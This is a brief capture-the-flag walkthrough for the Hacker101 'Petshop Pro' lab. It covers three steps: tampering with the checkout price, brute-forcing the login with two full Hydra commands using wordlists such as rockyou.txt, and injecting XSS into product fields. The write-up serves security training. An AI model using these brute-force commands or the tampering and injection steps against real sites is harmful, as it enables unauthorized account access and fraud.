Petshop Pro

CHALLENGE HINT

Flag0

Read the hint, we see vulnerability at check out page, let add kitten and puppy in our cart and check out. Inspect it and change the value of price to 0.

Flag1

Use FUZZING to find entrypoint and brute force credential.

Well, it took me lots of time to find the user name by Turbo in BurpSuite. We can also use Hydra to crack it.

hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'asd' f1230b94c6dbbc207a455a3c6414a0fb.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username" -t 64 -f

We have username, now we are looking for the password

hydra -l [username] -P rockyou.txt f1230b94c6dbbc207a455a3c6414a0fb.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:F=Invalid password" -t 64 -f

Flag2

We inject XSS payload to Edit page at Name and Description, then go to check out!